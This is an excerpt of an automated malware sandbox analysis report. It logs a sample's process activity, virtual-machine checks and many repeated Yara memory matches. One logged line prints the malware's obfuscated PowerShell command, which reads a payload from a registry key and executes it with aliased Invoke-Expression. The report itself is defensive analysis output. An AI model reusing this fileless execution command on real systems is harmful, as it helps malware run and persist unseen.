Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: explorer.exe, 00000013.00000000.619226655.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/ |
Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: RuntimeBroker.exe, 00000018.00000000.768961763.0000013857059000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWt |
Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW@1 |
Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000013.00000000.662218249.0000000007F91000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: explorer.exe, 00000013.00000000.614468947.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.661504495.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.606382937.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: Progman |
Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: YProgram Managerf |
Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: Progmanlock |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR |
Source: Yara match |
File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR |
Source: Yara match |
File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |